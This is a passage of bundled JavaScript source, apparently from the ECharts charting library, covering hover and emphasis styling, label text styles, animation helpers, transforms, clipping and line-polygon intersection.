singleEnterNormal);\n}\n\nfunction onElementEmphasisEvent(highlightDigit) {\n    this.__highByOuter |= 1 << (highlightDigit || 0);\n    traverseUpdate(this, singleEnterEmphasis);\n}\n\nfunction onElementNormalEvent(highlightDigit) {\n    !(this.__highByOuter &= ~(1 << (highlightDigit || 0)))\n        && traverseUpdate(this, singleEnterNormal);\n}\n\nfunction shouldSilent(el, e) {\n    return el.__highDownSilentOnTouch && e.zrByTouch;\n}\n\n/**\n * Set hover style (namely \"emphasis style\") of element,\n * based on the current style of the given `el`.\n *\n * (1)\n * **CONSTRAINTS** for this method:\n * <A> This method MUST be called after all of the normal styles having been adopted\n * to the `el`.\n * <B> The input `hoverStyle` (that is, \"emphasis style\") MUST be the subset of the\n * \"normal style\" having been set to the el.\n * <C> `color` MUST be one of the \"normal styles\" (because color might be lifted as\n * a default hover style).\n *\n * The reason: this method treat the current style of the `el` as the \"normal style\"\n * and cache them when enter/update the \"emphasis style\". Consider the case: the `el`\n * is in \"emphasis\" state and `setOption`/`dispatchAction` trigger the style updating\n * logic, where the el should shift from the original emphasis style to the new\n * \"emphasis style\" and should be able to \"downplay\" back to the new \"normal style\".\n *\n * Indeed, it is error-prone to make a interface has so many constraints, but I have\n * not found a better solution yet to fit the backward compatibility, performance and\n * the current programming style.\n *\n * (2)\n * Call the method for a \"root\" element once. Do not call it for each descendants.\n * If the descendants elemenets of a group has itself hover style different from the\n * root group, we can simply mount the style on `el.hoverStyle` for them, but should\n * not call this method for them.\n *\n * (3) These input parameters can be set directly on `el`:\n *\n * @param {module:zrender/Element} el\n * @param {Object} [el.hoverStyle] See `graphic.setElementHoverStyle`.\n * @param {boolean} [el.highDownSilentOnTouch=false] See `graphic.setAsHighDownDispatcher`.\n * @param {Function} [el.highDownOnUpdate] See `graphic.setAsHighDownDispatcher`.\n * @param {Object|boolean} [hoverStyle] See `graphic.setElementHoverStyle`.\n */\nfunction setHoverStyle(el, hoverStyle) {\n    setAsHighDownDispatcher(el, true);\n    traverseUpdate(el, setElementHoverStyle, hoverStyle);\n}\n\n/**\n * @param {module:zrender/Element} el\n * @param {Function} [el.highDownOnUpdate] Called when state updated.\n *        Since `setHoverStyle` has the constraint that it must be called after\n *        all of the normal style updated, `highDownOnUpdate` is not needed to\n *        trigger if both `fromState` and `toState` is 'normal', and needed to\n *        trigger if both `fromState` and `toState` is 'emphasis', which enables\n *        to sync outside style settings to \"emphasis\" state.\n *        @this {string} This dispatcher `el`.\n *        @param {string} fromState Can be \"normal\" or \"emphasis\".\n *               `fromState` might equal to `toState`,\n *               for example, when this method is called when `el` is\n *               on \"emphasis\" state.\n *        @param {string} toState Can be \"normal\" or \"emphasis\".\n *\n *        FIXME\n *        CAUTION: Do not expose `highDownOnUpdate` outside echarts.\n *        Because it is not a complete solution. The update\n *        listener should not have been mount in element,\n *        and the normal/emphasis state should not have\n *        mantained on elements.\n *\n * @param {boolean} [el.highDownSilentOnTouch=false]\n *        In touch device, mouseover event will be trigger on touchstart event\n *        (see module:zrender/dom/HandlerProxy). By this mechanism, we can\n *        conveniently use hoverStyle when tap on touch screen without additional\n *        code for compatibility.\n *        But if the chart/component has select feature, which usually also use\n *        hoverStyle, there might be conflict between 'select-highlight' and\n *        'hover-highlight' especially when roam is enabled (see geo for example).\n *        In this case, `highDownSilentOnTouch` should be used to disable\n *        hover-highlight on touch device.\n * @param {boolean} [asDispatcher=true] If `false`, do not set as \"highDownDispatcher\".\n */\nfunction setAsHighDownDispatcher(el, asDispatcher) {\n    var disable = asDispatcher === false;\n    // Make `highDownSilentOnTouch` and `highDownOnUpdate` only work after\n    // `setAsHighDownDispatcher` called. Avoid it is modified by user unexpectedly.\n    el.__highDownSilentOnTouch = el.highDownSilentOnTouch;\n    el.__highDownOnUpdate = el.highDownOnUpdate;\n\n    // Simple optimize, since this method might be\n    // called for each elements of a group in some cases.\n    if (!disable || el.__highDownDispatcher) {\n        var method = disable ? 'off' : 'on';\n\n        // Duplicated function will be auto-ignored, see Eventful.js.\n        el[method]('mouseover', onElementMouseOver)[method]('mouseout', onElementMouseOut);\n        // Emphasis, normal can be triggered manually by API or other components like hover link.\n        el[method]('emphasis', onElementEmphasisEvent)[method]('normal', onElementNormalEvent);\n        // Also keep previous record.\n        el.__highByOuter = el.__highByOuter || 0;\n\n        el.__highDownDispatcher = !disable;\n    }\n}\n\n/**\n * @param {module:zrender/src/Element} el\n * @return {boolean}\n */\nfunction isHighDownDispatcher(el) {\n    return !!(el && el.__highDownDispatcher);\n}\n\n/**\n * Support hightlight/downplay record on each elements.\n * For the case: hover highlight/downplay (legend, visualMap, ...) and\n * user triggerred hightlight/downplay should not conflict.\n * Only all of the highlightDigit cleared, return to normal.\n * @param {string} highlightKey\n * @return {number} highlightDigit\n */\nfunction getHighlightDigit(highlightKey) {\n    var highlightDigit = _highlightKeyMap[highlightKey];\n    if (highlightDigit == null && _highlightNextDigit <= 32) {\n        highlightDigit = _highlightKeyMap[highlightKey] = _highlightNextDigit++;\n    }\n    return highlightDigit;\n}\n\n/**\n * See more info in `setTextStyleCommon`.\n * @param {Object|module:zrender/graphic/Style} normalStyle\n * @param {Object} emphasisStyle\n * @param {module:echarts/model/Model} normalModel\n * @param {module:echarts/model/Model} emphasisModel\n * @param {Object} opt Check `opt` of `setTextStyleCommon` to find other props.\n * @param {string|Function} [opt.defaultText]\n * @param {module:echarts/model/Model} [opt.labelFetcher] Fetch text by\n *      `opt.labelFetcher.getFormattedLabel(opt.labelDataIndex, 'normal'/'emphasis', null, opt.labelDimIndex)`\n * @param {module:echarts/model/Model} [opt.labelDataIndex] Fetch text by\n *      `opt.textFetcher.getFormattedLabel(opt.labelDataIndex, 'normal'/'emphasis', null, opt.labelDimIndex)`\n * @param {module:echarts/model/Model} [opt.labelDimIndex] Fetch text by\n *      `opt.textFetcher.getFormattedLabel(opt.labelDataIndex, 'normal'/'emphasis', null, opt.labelDimIndex)`\n * @param {Object} [normalSpecified]\n * @param {Object} [emphasisSpecified]\n */\nfunction setLabelStyle(\n    normalStyle, emphasisStyle,\n    normalModel, emphasisModel,\n    opt,\n    normalSpecified, emphasisSpecified\n) {\n    opt = opt || EMPTY_OBJ;\n    var labelFetcher = opt.labelFetcher;\n    var labelDataIndex = opt.labelDataIndex;\n    var labelDimIndex = opt.labelDimIndex;\n\n    // This scenario, `label.normal.show = true; label.emphasis.show = false`,\n    // is not supported util someone requests.\n\n    var showNormal = normalModel.getShallow('show');\n    var showEmphasis = emphasisModel.getShallow('show');\n\n    // Consider performance, only fetch label when necessary.\n    // If `normal.show` is `false` and `emphasis.show` is `true` and `emphasis.formatter` is not set,\n    // label should be displayed, where text is fetched by `normal.formatter` or `opt.defaultText`.\n    var baseText;\n    if (showNormal || showEmphasis) {\n        if (labelFetcher) {\n            baseText = labelFetcher.getFormattedLabel(labelDataIndex, 'normal', null, labelDimIndex);\n        }\n        if (baseText == null) {\n            baseText = isFunction$1(opt.defaultText) ? opt.defaultText(labelDataIndex, opt) : opt.defaultText;\n        }\n    }\n    var normalStyleText = showNormal ? baseText : null;\n    var emphasisStyleText = showEmphasis\n        ? retrieve2(\n            labelFetcher\n                ? labelFetcher.getFormattedLabel(labelDataIndex, 'emphasis', null, labelDimIndex)\n                : null,\n            baseText\n        )\n        : null;\n\n    // Optimize: If style.text is null, text will not be drawn.\n    if (normalStyleText != null || emphasisStyleText != null) {\n        // Always set `textStyle` even if `normalStyle.text` is null, because default\n        // values have to be set on `normalStyle`.\n        // If we set default values on `emphasisStyle`, consider case:\n        // Firstly, `setOption(... label: {normal: {text: null}, emphasis: {show: true}} ...);`\n        // Secondly, `setOption(... label: {noraml: {show: true, text: 'abc', color: 'red'} ...);`\n        // Then the 'red' will not work on emphasis.\n        setTextStyle(normalStyle, normalModel, normalSpecified, opt);\n        setTextStyle(emphasisStyle, emphasisModel, emphasisSpecified, opt, true);\n    }\n\n    normalStyle.text = normalStyleText;\n    emphasisStyle.text = emphasisStyleText;\n}\n\n/**\n * Modify label style manually.\n * Only works after `setLabelStyle` and `setElementHoverStyle` called.\n *\n * @param {module:zrender/src/Element} el\n * @param {Object} [normalStyleProps] optional\n * @param {Object} [emphasisStyleProps] optional\n */\nfunction modifyLabelStyle(el, normalStyleProps, emphasisStyleProps) {\n    var elStyle = el.style;\n    if (normalStyleProps) {\n        rollbackDefaultTextStyle(elStyle);\n        el.setStyle(normalStyleProps);\n        applyDefaultTextStyle(elStyle);\n    }\n    elStyle = el.__hoverStl;\n    if (emphasisStyleProps && elStyle) {\n        rollbackDefaultTextStyle(elStyle);\n        extend(elStyle, emphasisStyleProps);\n        applyDefaultTextStyle(elStyle);\n    }\n}\n\n/**\n * Set basic textStyle properties.\n * See more info in `setTextStyleCommon`.\n * @param {Object|module:zrender/graphic/Style} textStyle\n * @param {module:echarts/model/Model} model\n * @param {Object} [specifiedTextStyle] Can be overrided by settings in model.\n * @param {Object} [opt] See `opt` of `setTextStyleCommon`.\n * @param {boolean} [isEmphasis]\n */\nfunction setTextStyle(\n    textStyle, textStyleModel, specifiedTextStyle, opt, isEmphasis\n) {\n    setTextStyleCommon(textStyle, textStyleModel, opt, isEmphasis);\n    specifiedTextStyle && extend(textStyle, specifiedTextStyle);\n    // textStyle.host && textStyle.host.dirty && textStyle.host.dirty(false);\n\n    return textStyle;\n}\n\n/**\n * Set text option in the style.\n * See more info in `setTextStyleCommon`.\n * @deprecated\n * @param {Object} textStyle\n * @param {module:echarts/model/Model} labelModel\n * @param {string|boolean} defaultColor Default text color.\n *        If set as false, it will be processed as a emphasis style.\n */\nfunction setText(textStyle, labelModel, defaultColor) {\n    var opt = {isRectText: true};\n    var isEmphasis;\n\n    if (defaultColor === false) {\n        isEmphasis = true;\n    }\n    else {\n        // Support setting color as 'auto' to get visual color.\n        opt.autoColor = defaultColor;\n    }\n    setTextStyleCommon(textStyle, labelModel, opt, isEmphasis);\n    // textStyle.host && textStyle.host.dirty && textStyle.host.dirty(false);\n}\n\n/**\n * The uniform entry of set text style, that is, retrieve style definitions\n * from `model` and set to `textStyle` object.\n *\n * Never in merge mode, but in overwrite mode, that is, all of the text style\n * properties will be set. (Consider the states of normal and emphasis and\n * default value can be adopted, merge would make the logic too complicated\n * to manage.)\n *\n * The `textStyle` object can either be a plain object or an instance of\n * `zrender/src/graphic/Style`, and either be the style of normal or emphasis.\n * After this mothod called, the `textStyle` object can then be used in\n * `el.setStyle(textStyle)` or `el.hoverStyle = textStyle`.\n *\n * Default value will be adopted and `insideRollbackOpt` will be created.\n * See `applyDefaultTextStyle` `rollbackDefaultTextStyle` for more details.\n *\n * opt: {\n *      disableBox: boolean, Whether diable drawing box of block (outer most).\n *      isRectText: boolean,\n *      autoColor: string, specify a color when color is 'auto',\n *              for textFill, textStroke, textBackgroundColor, and textBorderColor.\n *              If autoColor specified, it is used as default textFill.\n *      useInsideStyle:\n *              `true`: Use inside style (textFill, textStroke, textStrokeWidth)\n *                  if `textFill` is not specified.\n *              `false`: Do not use inside style.\n *              `null/undefined`: use inside style if `isRectText` is true and\n *                  `textFill` is not specified and textPosition contains `'inside'`.\n *      forceRich: boolean\n * }\n */\nfunction setTextStyleCommon(textStyle, textStyleModel, opt, isEmphasis) {\n    // Consider there will be abnormal when merge hover style to normal style if given default value.\n    opt = opt || EMPTY_OBJ;\n\n    if (opt.isRectText) {\n        var textPosition;\n        if (opt.getTextPosition) {\n            textPosition = opt.getTextPosition(textStyleModel, isEmphasis);\n        }\n        else {\n            textPosition = textStyleModel.getShallow('position')\n                || (isEmphasis ? null : 'inside');\n            // 'outside' is not a valid zr textPostion value, but used\n            // in bar series, and magric type should be considered.\n            textPosition === 'outside' && (textPosition = 'top');\n        }\n\n        textStyle.textPosition = textPosition;\n        textStyle.textOffset = textStyleModel.getShallow('offset');\n        var labelRotate = textStyleModel.getShallow('rotate');\n        labelRotate != null && (labelRotate *= Math.PI / 180);\n        textStyle.textRotation = labelRotate;\n        textStyle.textDistance = retrieve2(\n            textStyleModel.getShallow('distance'), isEmphasis ? null : 5\n        );\n    }\n\n    var ecModel = textStyleModel.ecModel;\n    var globalTextStyle = ecModel && ecModel.option.textStyle;\n\n    // Consider case:\n    // {\n    //     data: [{\n    //         value: 12,\n    //         label: {\n    //             rich: {\n    //                 // no 'a' here but using parent 'a'.\n    //             }\n    //         }\n    //     }],\n    //     rich: {\n    //         a: { ... }\n    //     }\n    // }\n    var richItemNames = getRichItemNames(textStyleModel);\n    var richResult;\n    if (richItemNames) {\n        richResult = {};\n        for (var name in richItemNames) {\n            if (richItemNames.hasOwnProperty(name)) {\n                // Cascade is supported in rich.\n                var richTextStyle = textStyleModel.getModel(['rich', name]);\n                // In rich, never `disableBox`.\n                // FIXME: consider `label: {formatter: '{a|xx}', color: 'blue', rich: {a: {}}}`,\n                // the default color `'blue'` will not be adopted if no color declared in `rich`.\n                // That might confuses users. So probably we should put `textStyleModel` as the\n                // root ancestor of the `richTextStyle`. But that would be a break change.\n                setTokenTextStyle(richResult[name] = {}, richTextStyle, globalTextStyle, opt, isEmphasis);\n            }\n        }\n    }\n    textStyle.rich = richResult;\n\n    setTokenTextStyle(textStyle, textStyleModel, globalTextStyle, opt, isEmphasis, true);\n\n    if (opt.forceRich && !opt.textStyle) {\n        opt.textStyle = {};\n    }\n\n    return textStyle;\n}\n\n// Consider case:\n// {\n//     data: [{\n//         value: 12,\n//         label: {\n//             rich: {\n//                 // no 'a' here but using parent 'a'.\n//             }\n//         }\n//     }],\n//     rich: {\n//         a: { ... }\n//     }\n// }\nfunction getRichItemNames(textStyleModel) {\n    // Use object to remove duplicated names.\n    var richItemNameMap;\n    while (textStyleModel && textStyleModel !== textStyleModel.ecModel) {\n        var rich = (textStyleModel.option || EMPTY_OBJ).rich;\n        if (rich) {\n            richItemNameMap = richItemNameMap || {};\n            for (var name in rich) {\n                if (rich.hasOwnProperty(name)) {\n                    richItemNameMap[name] = 1;\n                }\n            }\n        }\n        textStyleModel = textStyleModel.parentModel;\n    }\n    return richItemNameMap;\n}\n\nfunction setTokenTextStyle(textStyle, textStyleModel, globalTextStyle, opt, isEmphasis, isBlock) {\n    // In merge mode, default value should not be given.\n    globalTextStyle = !isEmphasis && globalTextStyle || EMPTY_OBJ;\n\n    textStyle.textFill = getAutoColor(textStyleModel.getShallow('color'), opt)\n        || globalTextStyle.color;\n    textStyle.textStroke = getAutoColor(textStyleModel.getShallow('textBorderColor'), opt)\n        || globalTextStyle.textBorderColor;\n    textStyle.textStrokeWidth = retrieve2(\n        textStyleModel.getShallow('textBorderWidth'),\n        globalTextStyle.textBorderWidth\n    );\n\n    if (!isEmphasis) {\n        if (isBlock) {\n            textStyle.insideRollbackOpt = opt;\n            applyDefaultTextStyle(textStyle);\n        }\n\n        // Set default finally.\n        if (textStyle.textFill == null) {\n            textStyle.textFill = opt.autoColor;\n        }\n    }\n\n    // Do not use `getFont` here, because merge should be supported, where\n    // part of these properties may be changed in emphasis style, and the\n    // others should remain their original value got from normal style.\n    textStyle.fontStyle = textStyleModel.getShallow('fontStyle') || globalTextStyle.fontStyle;\n    textStyle.fontWeight = textStyleModel.getShallow('fontWeight') || globalTextStyle.fontWeight;\n    textStyle.fontSize = textStyleModel.getShallow('fontSize') || globalTextStyle.fontSize;\n    textStyle.fontFamily = textStyleModel.getShallow('fontFamily') || globalTextStyle.fontFamily;\n\n    textStyle.textAlign = textStyleModel.getShallow('align');\n    textStyle.textVerticalAlign = textStyleModel.getShallow('verticalAlign')\n        || textStyleModel.getShallow('baseline');\n\n    textStyle.textLineHeight = textStyleModel.getShallow('lineHeight');\n    textStyle.textWidth = textStyleModel.getShallow('width');\n    textStyle.textHeight = textStyleModel.getShallow('height');\n    textStyle.textTag = textStyleModel.getShallow('tag');\n\n    if (!isBlock || !opt.disableBox) {\n        textStyle.textBackgroundColor = getAutoColor(textStyleModel.getShallow('backgroundColor'), opt);\n        textStyle.textPadding = textStyleModel.getShallow('padding');\n        textStyle.textBorderColor = getAutoColor(textStyleModel.getShallow('borderColor'), opt);\n        textStyle.textBorderWidth = textStyleModel.getShallow('borderWidth');\n        textStyle.textBorderRadius = textStyleModel.getShallow('borderRadius');\n\n        textStyle.textBoxShadowColor = textStyleModel.getShallow('shadowColor');\n        textStyle.textBoxShadowBlur = textStyleModel.getShallow('shadowBlur');\n        textStyle.textBoxShadowOffsetX = textStyleModel.getShallow('shadowOffsetX');\n        textStyle.textBoxShadowOffsetY = textStyleModel.getShallow('shadowOffsetY');\n    }\n\n    textStyle.textShadowColor = textStyleModel.getShallow('textShadowColor')\n        || globalTextStyle.textShadowColor;\n    textStyle.textShadowBlur = textStyleModel.getShallow('textShadowBlur')\n        || globalTextStyle.textShadowBlur;\n    textStyle.textShadowOffsetX = textStyleModel.getShallow('textShadowOffsetX')\n        || globalTextStyle.textShadowOffsetX;\n    textStyle.textShadowOffsetY = textStyleModel.getShallow('textShadowOffsetY')\n        || globalTextStyle.textShadowOffsetY;\n}\n\nfunction getAutoColor(color, opt) {\n    return color !== 'auto' ? color : (opt && opt.autoColor) ? opt.autoColor : null;\n}\n\n/**\n * Give some default value to the input `textStyle` object, based on the current settings\n * in this `textStyle` object.\n *\n * The Scenario:\n * when text position is `inside` and `textFill` is not specified, we show\n * text border by default for better view. But it should be considered that text position\n * might be changed when hovering or being emphasis, where the `insideRollback` is used to\n * restore the style.\n *\n * Usage (& NOTICE):\n * When a style object (eithor plain object or instance of `zrender/src/graphic/Style`) is\n * about to be modified on its text related properties, `rollbackDefaultTextStyle` should\n * be called before the modification and `applyDefaultTextStyle` should be called after that.\n * (For the case that all of the text related properties is reset, like `setTextStyleCommon`\n * does, `rollbackDefaultTextStyle` is not needed to be called).\n */\nfunction applyDefaultTextStyle(textStyle) {\n    var textPosition = textStyle.textPosition;\n    var opt = textStyle.insideRollbackOpt;\n    var insideRollback;\n\n    if (opt && textStyle.textFill == null) {\n        var autoColor = opt.autoColor;\n        var isRectText = opt.isRectText;\n        var useInsideStyle = opt.useInsideStyle;\n\n        var useInsideStyleCache = useInsideStyle !== false\n            && (useInsideStyle === true\n                || (isRectText\n                    && textPosition\n                    // textPosition can be [10, 30]\n                    && typeof textPosition === 'string'\n                    && textPosition.indexOf('inside') >= 0\n                )\n            );\n        var useAutoColorCache = !useInsideStyleCache && autoColor != null;\n\n        // All of the props declared in `CACHED_LABEL_STYLE_PROPERTIES` are to be cached.\n        if (useInsideStyleCache || useAutoColorCache) {\n            insideRollback = {\n                textFill: textStyle.textFill,\n                textStroke: textStyle.textStroke,\n                textStrokeWidth: textStyle.textStrokeWidth\n            };\n        }\n        if (useInsideStyleCache) {\n            textStyle.textFill = '#fff';\n            // Consider text with #fff overflow its container.\n            if (textStyle.textStroke == null) {\n                textStyle.textStroke = autoColor;\n                textStyle.textStrokeWidth == null && (textStyle.textStrokeWidth = 2);\n            }\n        }\n        if (useAutoColorCache) {\n            textStyle.textFill = autoColor;\n        }\n    }\n\n    // Always set `insideRollback`, so that the previous one can be cleared.\n    textStyle.insideRollback = insideRollback;\n}\n\n/**\n * Consider the case: in a scatter,\n * label: {\n *     normal: {position: 'inside'},\n *     emphasis: {position: 'top'}\n * }\n * In the normal state, the `textFill` will be set as '#fff' for pretty view (see\n * `applyDefaultTextStyle`), but when switching to emphasis state, the `textFill`\n * should be retured to 'autoColor', but not keep '#fff'.\n */\nfunction rollbackDefaultTextStyle(style) {\n    var insideRollback = style.insideRollback;\n    if (insideRollback) {\n        // Reset all of the props in `CACHED_LABEL_STYLE_PROPERTIES`.\n        style.textFill = insideRollback.textFill;\n        style.textStroke = insideRollback.textStroke;\n        style.textStrokeWidth = insideRollback.textStrokeWidth;\n        style.insideRollback = null;\n    }\n}\n\nfunction getFont(opt, ecModel) {\n    var gTextStyleModel = ecModel && ecModel.getModel('textStyle');\n    return trim([\n        // FIXME in node-canvas fontWeight is before fontStyle\n        opt.fontStyle || gTextStyleModel && gTextStyleModel.getShallow('fontStyle') || '',\n        opt.fontWeight || gTextStyleModel && gTextStyleModel.getShallow('fontWeight') || '',\n        (opt.fontSize || gTextStyleModel && gTextStyleModel.getShallow('fontSize') || 12) + 'px',\n        opt.fontFamily || gTextStyleModel && gTextStyleModel.getShallow('fontFamily') || 'sans-serif'\n    ].join(' '));\n}\n\nfunction animateOrSetProps(isUpdate, el, props, animatableModel, dataIndex, cb) {\n    if (typeof dataIndex === 'function') {\n        cb = dataIndex;\n        dataIndex = null;\n    }\n    // Do not check 'animation' property directly here. Consider this case:\n    // animation model is an `itemModel`, whose does not have `isAnimationEnabled`\n    // but its parent model (`seriesModel`) does.\n    var animationEnabled = animatableModel && animatableModel.isAnimationEnabled();\n\n    if (animationEnabled) {\n        var postfix = isUpdate ? 'Update' : '';\n        var duration = animatableModel.getShallow('animationDuration' + postfix);\n        var animationEasing = animatableModel.getShallow('animationEasing' + postfix);\n        var animationDelay = animatableModel.getShallow('animationDelay' + postfix);\n        if (typeof animationDelay === 'function') {\n            animationDelay = animationDelay(\n                dataIndex,\n                animatableModel.getAnimationDelayParams\n                    ? animatableModel.getAnimationDelayParams(el, dataIndex)\n                    : null\n            );\n        }\n        if (typeof duration === 'function') {\n            duration = duration(dataIndex);\n        }\n\n        duration > 0\n            ? el.animateTo(props, duration, animationDelay || 0, animationEasing, cb, !!cb)\n            : (el.stopAnimation(), el.attr(props), cb && cb());\n    }\n    else {\n        el.stopAnimation();\n        el.attr(props);\n        cb && cb();\n    }\n}\n\n/**\n * Update graphic element properties with or without animation according to the\n * configuration in series.\n *\n * Caution: this method will stop previous animation.\n * So do not use this method to one element twice before\n * animation starts, unless you know what you are doing.\n *\n * @param {module:zrender/Element} el\n * @param {Object} props\n * @param {module:echarts/model/Model} [animatableModel]\n * @param {number} [dataIndex]\n * @param {Function} [cb]\n * @example\n *     graphic.updateProps(el, {\n *         position: [100, 100]\n *     }, seriesModel, dataIndex, function () { console.log('Animation done!'); });\n *     // Or\n *     graphic.updateProps(el, {\n *         position: [100, 100]\n *     }, seriesModel, function () { console.log('Animation done!'); });\n */\nfunction updateProps(el, props, animatableModel, dataIndex, cb) {\n    animateOrSetProps(true, el, props, animatableModel, dataIndex, cb);\n}\n\n/**\n * Init graphic element properties with or without animation according to the\n * configuration in series.\n *\n * Caution: this method will stop previous animation.\n * So do not use this method to one element twice before\n * animation starts, unless you know what you are doing.\n *\n * @param {module:zrender/Element} el\n * @param {Object} props\n * @param {module:echarts/model/Model} [animatableModel]\n * @param {number} [dataIndex]\n * @param {Function} cb\n */\nfunction initProps(el, props, animatableModel, dataIndex, cb) {\n    animateOrSetProps(false, el, props, animatableModel, dataIndex, cb);\n}\n\n/**\n * Get transform matrix of target (param target),\n * in coordinate of its ancestor (param ancestor)\n *\n * @param {module:zrender/mixin/Transformable} target\n * @param {module:zrender/mixin/Transformable} [ancestor]\n */\nfunction getTransform(target, ancestor) {\n    var mat = identity([]);\n\n    while (target && target !== ancestor) {\n        mul$1(mat, target.getLocalTransform(), mat);\n        target = target.parent;\n    }\n\n    return mat;\n}\n\n/**\n * Apply transform to an vertex.\n * @param {Array.<number>} target [x, y]\n * @param {Array.<number>|TypedArray.<number>|Object} transform Can be:\n *      + Transform matrix: like [1, 0, 0, 1, 0, 0]\n *      + {position, rotation, scale}, the same as `zrender/Transformable`.\n * @param {boolean=} invert Whether use invert matrix.\n * @return {Array.<number>} [x, y]\n */\nfunction applyTransform$1(target, transform, invert$$1) {\n    if (transform && !isArrayLike(transform)) {\n        transform = Transformable.getLocalTransform(transform);\n    }\n\n    if (invert$$1) {\n        transform = invert([], transform);\n    }\n    return applyTransform([], target, transform);\n}\n\n/**\n * @param {string} direction 'left' 'right' 'top' 'bottom'\n * @param {Array.<number>} transform Transform matrix: like [1, 0, 0, 1, 0, 0]\n * @param {boolean=} invert Whether use invert matrix.\n * @return {string} Transformed direction. 'left' 'right' 'top' 'bottom'\n */\nfunction transformDirection(direction, transform, invert$$1) {\n\n    // Pick a base, ensure that transform result will not be (0, 0).\n    var hBase = (transform[4] === 0 || transform[5] === 0 || transform[0] === 0)\n        ? 1 : Math.abs(2 * transform[4] / transform[0]);\n    var vBase = (transform[4] === 0 || transform[5] === 0 || transform[2] === 0)\n        ? 1 : Math.abs(2 * transform[4] / transform[2]);\n\n    var vertex = [\n        direction === 'left' ? -hBase : direction === 'right' ? hBase : 0,\n        direction === 'top' ? -vBase : direction === 'bottom' ? vBase : 0\n    ];\n\n    vertex = applyTransform$1(vertex, transform, invert$$1);\n\n    return Math.abs(vertex[0]) > Math.abs(vertex[1])\n        ? (vertex[0] > 0 ? 'right' : 'left')\n        : (vertex[1] > 0 ? 'bottom' : 'top');\n}\n\n/**\n * Apply group transition animation from g1 to g2.\n * If no animatableModel, no animation.\n */\nfunction groupTransition(g1, g2, animatableModel, cb) {\n    if (!g1 || !g2) {\n        return;\n    }\n\n    function getElMap(g) {\n        var elMap = {};\n        g.traverse(function (el) {\n            if (!el.isGroup && el.anid) {\n                elMap[el.anid] = el;\n            }\n        });\n        return elMap;\n    }\n    function getAnimatableProps(el) {\n        var obj = {\n            position: clone$1(el.position),\n            rotation: el.rotation\n        };\n        if (el.shape) {\n            obj.shape = extend({}, el.shape);\n        }\n        return obj;\n    }\n    var elMap1 = getElMap(g1);\n\n    g2.traverse(function (el) {\n        if (!el.isGroup && el.anid) {\n            var oldEl = elMap1[el.anid];\n            if (oldEl) {\n                var newProp = getAnimatableProps(el);\n                el.attr(getAnimatableProps(oldEl));\n                updateProps(el, newProp, animatableModel, el.dataIndex);\n            }\n            // else {\n            //     if (el.previousProps) {\n            //         graphic.updateProps\n            //     }\n            // }\n        }\n    });\n}\n\n/**\n * @param {Array.<Array.<number>>} points Like: [[23, 44], [53, 66], ...]\n * @param {Object} rect {x, y, width, height}\n * @return {Array.<Array.<number>>} A new clipped points.\n */\nfunction clipPointsByRect(points, rect) {\n    // FIXME: this way migth be incorrect when grpahic clipped by a corner.\n    // and when element have border.\n    return map(points, function (point) {\n        var x = point[0];\n        x = mathMax$1(x, rect.x);\n        x = mathMin$1(x, rect.x + rect.width);\n        var y = point[1];\n        y = mathMax$1(y, rect.y);\n        y = mathMin$1(y, rect.y + rect.height);\n        return [x, y];\n    });\n}\n\n/**\n * @param {Object} targetRect {x, y, width, height}\n * @param {Object} rect {x, y, width, height}\n * @return {Object} A new clipped rect. If rect size are negative, return undefined.\n */\nfunction clipRectByRect(targetRect, rect) {\n    var x = mathMax$1(targetRect.x, rect.x);\n    var x2 = mathMin$1(targetRect.x + targetRect.width, rect.x + rect.width);\n    var y = mathMax$1(targetRect.y, rect.y);\n    var y2 = mathMin$1(targetRect.y + targetRect.height, rect.y + rect.height);\n\n    // If the total rect is cliped, nothing, including the border,\n    // should be painted. So return undefined.\n    if (x2 >= x && y2 >= y) {\n        return {\n            x: x,\n            y: y,\n            width: x2 - x,\n            height: y2 - y\n        };\n    }\n}\n\n/**\n * @param {string} iconStr Support 'image://' or 'path://' or direct svg path.\n * @param {Object} [opt] Properties of `module:zrender/Element`, except `style`.\n * @param {Object} [rect] {x, y, width, height}\n * @return {module:zrender/Element} Icon path or image element.\n */\nfunction createIcon(iconStr, opt, rect) {\n    opt = extend({rectHover: true}, opt);\n    var style = opt.style = {strokeNoScale: true};\n    rect = rect || {x: -1, y: -1, width: 2, height: 2};\n\n    if (iconStr) {\n        return iconStr.indexOf('image://') === 0\n            ? (\n                style.image = iconStr.slice(8),\n                defaults(style, rect),\n                new ZImage(opt)\n            )\n            : (\n                makePath(\n                    iconStr.replace('path://', ''),\n                    opt,\n                    rect,\n                    'center'\n                )\n            );\n    }\n}\n\n/**\n * Return `true` if the given line (line `a`) and the given polygon\n * are intersect.\n * Note that we do not count colinear as intersect here because no\n * requirement for that. We could do that if required in future.\n *\n * @param {number} a1x\n * @param {number} a1y\n * @param {number} a2x\n * @param {number} a2y\n * @param {Array.<Array.<number>>} points Points of the polygon.\n * @return {boolean}\n */\nfunction linePolygonIntersect(a1x, a1y, a2x, a2y, points) {\n    for (var i = 0, p2 = points[points.length - 1]; i < points.length; i++) {\n        var p = points[i];\n        if (lineLineIntersect(a1x, a1y, a2x, a2y, p[0], p[1], p2[0], p2[1])) {\n            return true;\n        }\n        p2 = p;\n    }\n}\n\n/**\n * Return `true` if the given two lines (line `a` and line `b`)\n * are intersect.\n * Note that we do not count colinear as intersect here because no\n * requirement for that. We could do that if required in future.\n *\n * @param {number} a1x\n * @param {number} a1y\n * @param {number} a2x\n * @param {number} a2y\n * @param {number} b1x\n * @param {number} b1y\n * @param {number} b2x\n * @param {number} b2y\n * @return {boolean}\n */\nfunction lineLineIntersect(a1x, a1y, a2x, a2y, b1x, b1y, b2x, b2y) {\n    // let `vec_m` to be `vec_a2 - vec_a1` and `vec_n` to be `vec_b2 - vec_b1`.\n    var mx = a2x - a1x;\n    var my = a2y - a1y;\n    var nx = b2x - b1x;\n    var ny = b2y - b1y;\n\n    // `vec_m` and `vec_n` are parallel iff\n    //     exising `k` such that `vec_m = k · vec_n`, equivalent to `vec_m X vec_n = 0`.\n    var nmCrossProduct = crossProduct2d(nx, ny, mx, my);\n    if (nearZero(nmCrossProduct)) {\n        return false;\n    }\n\n    // `vec_m` and `vec_n` are intersect iff\n    //     existing `p` and `q` in [0, 1] such that `vec_a1 + p * vec_m = vec_b1 + q * vec_n`,\n    //     such that `q = ((vec_a1 - vec_b1) X vec_m) / (vec_n X vec_m)`\n    //           and `p = ((vec_a1 - vec_b1) X vec_n) / (vec_n X vec_m)`.\n    var b1a1x = a1x - b1x;\n    var b1a1y = a1y - b1y;\n    var q = crossProduct2d(b1a1x, b1a1y, mx, my) / nmCrossProduct;\n    if (q < 0 || q > 1) {\n        return false;\n    }\n   